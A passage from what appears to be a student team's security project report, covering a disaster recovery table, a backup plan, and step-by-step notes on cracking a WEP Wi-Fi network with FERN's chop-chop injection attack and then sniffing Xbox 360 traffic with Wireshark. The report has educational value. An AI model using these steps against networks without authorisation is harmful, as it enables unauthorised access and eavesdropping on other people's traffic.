connections and power outlets that can be utilized to perform some less technical aspects of the
project. Finally, known residences of family and friends outside of a specific disaster’s radius
can be employed by team members for both utilities and workstations, as well as a safe place to
conduct the more sensitive aspects of the project involving breaking wireless encryption.
P a g e | 32
Critical System Threats Response Strategy Recovery Strategy
Xbox Console Xbox Live Downtime,
Physical Theft,
Environmental Threats,
Device Failure
Determine nature of problem,
confirm device is not
functional, troubleshoot
device
Utilize alternate device while
recovering primary if necessary,
alter project scope if alternate is
unavailable/unworkable
Team Computers Theft, Environmental
Threats, Device Failure Ensure device is inoperable,
confirm data was
saved/stored elsewhere,
troubleshoot device
Shift data/assignment to other
members while device is recovered,
utilize alternative workstation if
device cannot be fixed in a timely
manner
Team Data Theft, Environmental
Threats, Device Failure Verify data was saved/stored,
switch to alternative storage
location/medium/device,
adhere to backup plan,
determine nature of data
threat
Fix data issue/device, continue to
adhere to backup plan
Utilities Environmental Threats Locate alternative work sites
or stations, alert team of
viable locations
Return to normal
devices/workstations and sites,
ensure proper backup plan
adherence
Backup Plan
At a glance:
Type: Full Backup
Frequency: One per meeting, week, or deadline – whichever occurs first
Hardware: Team Member’s personal computer, flash drives, and university machines
Storage Location: Onsite and Offsite. Onsite – Personal devices. Offsite – University machines
and cloud storage.
P a g e | 33
Details
In order to ensure a smooth recovery from any possible disaster or setback, Team
Clockwork has elected to employ a full backup strategy. As a result, the team will ensure that
each member backs up all of the data, documents, and major software involved in the project to
ensure straightforward recovery. In line with a good backup plan, this means that we will not
only be backing up our essential documents and files associated with the project, but also
maintaining multiple operable copies of the Kali Linux distribution that we have elected to use
and maintaining complete records of team communications. The latter task is accomplished
through the GroupMe application, which allows our communications and profiles to be stored
locally and remotely. This step, while possibly unnecessary, was largely inspired by some of the
requirements of SOX.
Everyone within the team will be responsible for backups – as a result, data and software
will be almost impossible to lose and all team members will constantly be updated and aware of
the project’s current status and deadlines. This decentralized approach works well with the nature
of a less-formal group project and carries the secondary purpose of ensuring every member is
actively engaged in the assignment.
Full backups should be conducted every week, every major project deadline, or after
every team meeting, whichever occurs more frequently. A variable frequency dependent
primarily on important events offers the most reliable option to ensure that all data and software
is properly backed up after important changes are made or milestones are reached.
As a team, we have elected to use both onsite and offsite storage methods to ensure
effective and resilient backups. In terms of onsite storage, we are utilizing our devices and flash
drives as a means of individual, local backups. For offsite backups, university machines and
P a g e | 34
cloud storage via Google Drive meet our team’s needs as well as facilitating team collaboration
efforts.
Overall, our backup plan ensures a simple but effective means of complete recovery from
nearly any disaster. By requiring everything be backed up by anyone, we have not created an
unnecessary burden due to the limited scope of the project, but do ensure that everyone is
involved and engaged. Similarly, requiring these backups be done dependent on periods of
productivity or within a certain time frame ensures that important progress will always be
recoverable. Finally, the overall strength of our plan is only reinforced by requiring the backups
be done on two physical devices onsite as well as two off site, remotely accessible locations.
P a g e | 35
Technical Implementation
Installation of Kali Linux
In order to allow the use of Kali Linux without installing it the on hard drive, we used
Linux Live to create a bootable live drive to be able to run the operating system off the flash
drive. After the live drive was made, we had to change the BIOS settings of the computer we
intended to run it on. The boot priority was edited to allow the flash drive with Kali Linux to
boot when the flash drive was inserted into the computer and restarted. Once the flash drive
loaded the Kali Linux distribution, we selected Run AMD 64, which would boot Kali Linux
without installing. After a few minutes the GUI loaded and the operating system was live and
ready for use.
Cracking into the Target Wi-Fi
After analysis of the target network, we determined that network was using a WEP
encryption. Once we had determined the type of encryption the network was utilizing, we began
research of WEP cracking methods. The most practical method of cracking the Wi-Fi and
gaining access to network would be through a program call FERN, a python based cracking
program.
The network was put into monitor mode through the command console, then the WiFi
cracking program FERN was launched. Once the program was launched we began scanning for
the target network, once the network was found we instructed the program to attack the target
network. Before the attack commenced, the option to automate the attack was checked, this also
P a g e | 36
enabled the program to initialize packet injection into the target network to speed up the process
of cracking.
After 3-4 minutes the cracking was successful and the network key was displayed. The
network key was confirmed, and was used to gain access to the network. Once access to the
network was obtained, we launched the program Wireshark to begin packet sniffing. Wireshark
was set to sniff packets on the target network we gained access to, after 5-10 minutes of sniffing,
we ended the capture. After analysis of the packets we determined that we were able to capture
Microsoft Certificates from the Xbox 360 used to authenticate users. We also captured packets
with URL’s attached to them that enabled us to download images and other GUI components
directly from out web browser on a computer. Another interesting catch was the IGMPv2
protocol, which is used for multicast group protocols which indicates it goes hand in hand with
the account subscription verification of an Xbox Live Account.
P a g e | 37
Appendix of Detailed Setup Instructions
1. Downloaded the penetration testing operating system, Kali Linux
2. Once image file was downloaded, we proceeded to use Linux Live to write the image to a
flash drive to make the drive bootable
3. After the drive was finished, we configured the attacking laptops BIOS setting to boot
from the flash drive
4. When the BIOS was configured, we plugged in our flash drive and booted into Kali
Linux
5. In the Kali Linux menu we chose AMD 64 graphic, which boots a GUI for Kali Linux
6. Once we were in the Kali Linux GUI, we proceeded to open up FERN
7. With network monitor mode enabled, we began scanning for the target network
8. Once the network was found we selected the target network, enabled “automate attack”
and selected “chop-chop attack” from the packet injection drop down menu and begun
the attack
9. After 5 minutes the attack was successful and displayed the network key
10. The key was used to gain access to the network, once in we opened up Wireshark
11. Before we begun the capture, we bridged the connection from the Xbox 360 to the
attacking laptop
12. In Kali Linux we modified the network connection to allow sharing of internet to other
devices
13. After booting up the Xbox 360, we begun capturing on eth0 (Ethernet port)
P a g e | 38
14. While capturing we signed into an Xbox live account and navigated though the menus
and applications
15. After 10 minutes of capturing we ended the capture and begun analysis of the packets
16. After analysis of packets we found packets pulling media data and included a partial URL
17. We copied the URL, added “download.xbox.com” at the beginning of the url and copied
it into a browser
18. After a couple seconds the browser loaded the image that was displayed on the Xbox 360
GUI
P a g e | 39
Appendix of Problems
Problem One: Too much data on the network.
Fix: Reduce overall traffic and bridge console’s network connection via laptop.
Problem Two: Fern malfunction.
Fix: Packet Injection change to chop chop method and increase overall traffic on network.
Problem Three: Nature of Kerberos Tokens.
Fix: They are not sent from Xbox Live to console but rather between consoles in peer-to-peer
connections.
Problem Four: Unable to discover networks in Kali Linux.
Fix: Enable monitor mode on network card.
Problem Five: Lack of Xbox Traffic.
Fix: Sign in to Xbox Live after Wireshark capture starts.